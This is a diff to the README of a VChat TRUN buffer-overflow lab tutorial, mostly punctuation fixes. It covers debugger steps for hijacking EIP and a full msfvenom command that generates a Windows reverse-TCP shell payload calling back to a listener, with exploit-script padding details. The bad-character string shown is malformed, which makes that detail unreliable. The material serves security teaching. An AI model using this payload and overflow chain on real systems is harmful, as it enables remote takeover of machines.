xinwenfu/VChat_TRUN/README.md

 		<img src="Images/I18.png" width=600>

          * Notice that the EIP now points to an essfunc.dll address!
-	4. Once the overflow occurs click the *step into* button highlighted below.
+	4. Once the overflow occurs, click the *step into* button highlighted below.

 		<img src="Images/I19.png" width=600>

-	5. Notice that we jump to the stack we just overflowed!
+	5. Notice that we jumped to the stack; we just overflowed!

 		<img src="Images/I20.png" width=600>

 Now that we have all the necessary parts for the creation of a exploit we will discuss what we have done so far (the **exploit.py** files), and how we can now expand our efforts to gain a shell in the target machine.
 ### Exploitations
-Up until this point in time  we have been performing [Denial of Service](https://attack.mitre.org/techniques/T0814/) (DoS) attacks.
+Up until this point in time,  we have been performing [Denial of Service](https://attack.mitre.org/techniques/T0814/) (DoS) attacks.
 Since we simply overflowed the stack with what is effectively garbage address values (A series of `A`s, `B`s and `C`s) all we have done with our exploits is crash the VChat server.
 Now, we have all the information necessary to control the flow of VChat's execution, allowing us to inject [Shellcode](https://www.sentinelone.com/blog/malicious-input-how-hackers-use-shellcode/) and perform a more meaningful attack.

-1. We first need to generate some shellcode to inject into the process.
+1. We first need to generate some shell code to inject into the process.
 We will use the [msfvenom](https://docs.metasploit.com/docs/using-metasploit/basics/how-to-use-msfvenom.html) tool to both generate shellcode and encode it to ensure it is transmitted properly.
 We **must** encode the resulting shellcode so it does not contain any null bytes `0x0`, carriage returns `\r` or newlines `\n`, as their presence would prevent the shellcode from properly executing by breaking the transmission, reception or execution of the shellcode.
 	```sh
 	$ msfvenom -p windows/shell_reverse_tcp LHOST=10.0.2.7 LPORT=8080 EXITFUNC=thread -f python -v SHELL -b '\x00x\0a\x0d'
 	```
 	* `-p `: Payload we are generating shellcode for.
-    	* `windows/shell_reverse_tcp`: Reverse TCP payload for Windows
+    	* `windows/shell_reverse_tcp`: Reverse TCP payload for Windows.
-    	* `LHOST=10.0.2.7`: The remote listening host's IP, in this case our Kali machine's IP 10.0.2.7
+    	* `LHOST=10.0.2.7`: The remote listening host's IP, in this case our Kali machine's IP `10.0.2.7`.
-    	* `LPORT=8080`: The port on the remote listening host's traffic should be directed to in this case port 8080
+    	* `LPORT=8080`: The port on the remote listening host's traffic should be directed to in this case port 8080.
-    	* `EXITFUNC=thread`: Create a thread to run the payload
+    	* `EXITFUNC=thread`: Create a thread to run the payload.
-  	* `-f`: The output format
+  	* `-f`: The output format.
     	* `python`: Format for use in python scripts.
-  	* `-v`: Specify a custom variable name
+  	* `-v`: Specify a custom variable name.
-    	* `SHELL`: Shell Variable name
+    	* `SHELL`: Shell Variable name.
   	* `-b`: Specifies bad chars and byte values.
-This is given in the byte values
+This is given in the byte values.
       	* `\x00x\0a\x0d`: Null char, carriage return, and newline.

 2. Insert this into your exploit python code as shown in [exploit4.py](./SourceCode/exploit4.py) or [exploit5.py](./SourceCode/exploit5.py).
 The only difference between the two is that the extra padding at the end of [exploit4.py](./SourceCode/exploit4.py)'s payload `b'C' * (5000 - 2003 - 4 - 32 - len(SHELL))` is not needed.